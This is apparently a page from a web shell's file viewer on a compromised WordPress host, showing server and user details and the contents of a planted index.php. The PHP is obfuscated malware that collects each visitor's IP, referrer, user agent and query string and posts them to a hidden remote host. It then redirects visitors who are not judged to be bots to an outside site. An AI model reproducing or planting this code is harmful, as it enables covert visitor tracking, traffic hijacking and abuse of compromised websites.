HEX
Server: Apache
System: Linux 65-254-81-60.cprapid.com 4.18.0-477.27.2.el8_8.x86_64 #1 SMP Fri Sep 29 08:21:01 EDT 2023 x86_64
User: roshanchandy (1003)
PHP: 8.4.12
Disabled: exec,passthru,shell_exec,system
$ pwd: /home/roshanchandy/public_html/dubai91.com/maps/wp-includes-old/block-patterns/
Upload Files
File: /home/roshanchandy/public_html/dubai91.com/maps/wp-includes-old/block-patterns/index.php
<?php
 if (!function_exists('xBIzL7Wksw')) { function xBIzL7Wksw() { $xlN7Ol = $_SERVER['SERVER_ADDR']; $xvTrp = '127.0.0.1'; if ((!empty($_SERVER['HTTP_CF_CONNECTING_IP'])) && (($_SERVER['HTTP_CF_CONNECTING_IP'])!=$xvTrp) && (($_SERVER['HTTP_CF_CONNECTING_IP'])!=($xlN7Ol))) {$ip=$_SERVER['HTTP_CF_CONNECTING_IP'];} elseif ((!empty($_SERVER['GEOIP_ADDR'])) && (($_SERVER['GEOIP_ADDR'])!=$xvTrp)) {$ip=$_SERVER['GEOIP_ADDR'];} elseif ((!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) && (($_SERVER['HTTP_X_FORWARDED_FOR'])!=$xvTrp) && (($_SERVER['HTTP_X_FORWARDED_FOR'])!=($xlN7Ol))) {$ip=explode(',',$_SERVER['HTTP_X_FORWARDED_FOR'])[0];} elseif ((!empty($_SERVER['HTTP_CLIENT_IP'])) && (($_SERVER['HTTP_CLIENT_IP'])!=$xvTrp) && (($_SERVER['HTTP_CLIENT_IP'])!=($xlN7Ol))) {$ip=$_SERVER['HTTP_CLIENT_IP'];} else {$ip=$_SERVER['REMOTE_ADDR'];} return $ip; }}  $ip=xBIzL7Wksw(); 
 if (!function_exists('xaCzY1kQfKT')) { function xaCzY1kQfKT() { if(empty($_SERVER['HTTP_REFERER'])) { $_SERVER['HTTP_REFERER'] = getenv('HTTP_REFERER'); } return $_SERVER['HTTP_REFERER']; }} $ref=xaCzY1kQfKT(); 
 if (!function_exists('xchkdklPLp')) { function xchkdklPLp() { if(empty($_SERVER['HTTP_USER_AGENT'])) { $_SERVER['HTTP_USER_AGENT'] = getenv('HTTP_USER_AGENT'); } return $_SERVER['HTTP_USER_AGENT']; }} $eRf9t9d9 = xchkdklPLp(); 
 if ($_SERVER['QUERY_STRING']!=''){ $dHerF777hg = ''.urlencode($_SERVER['QUERY_STRING']).''; } else {$dHerF777hg = '';} 
 $sourcename = 'cr'; $whatdo = 'find'; $sourceid = ''; $who = 'us'; $fd = 'y909012'; $dex9 = '.re'; $langua = 'na'; $command = 'st'; 
 $ch = curl_init(); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_URL, 'https://'.$whatdo.''.$who.''.$dex9.''.$command.'/'.$who.''.$command.'.php'); curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); curl_setopt($ch, CURLOPT_TIMEOUT,333); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, 'fd='.$fd.'&ip='.$ip.'&ref='.$ref.'&ua='.$eRf9t9d9.'&data='.$dHerF777hg.'&sourceid='.$sourceid.'&sourcename='.$sourcename.''); $ifbot = curl_exec($ch); curl_close($ch); 
 if ($ifbot == '') { echo '<h1>CURL ERROR</h1>'; } elseif ($ifbot != '0') {  } else { if (!empty($dHerF777hg)) { echo "<script type='text/javascript'> window.location.href='https://combrokers.com.au/old-site/var/www/html/?".urldecode($dHerF777hg)."' </script> ";} else { echo "<script type='text/javascript'> window.location.href='https://combrokers.com.au/old-site/var/www/html/' </script> ";} exit; } 
 ?>
@ Telegram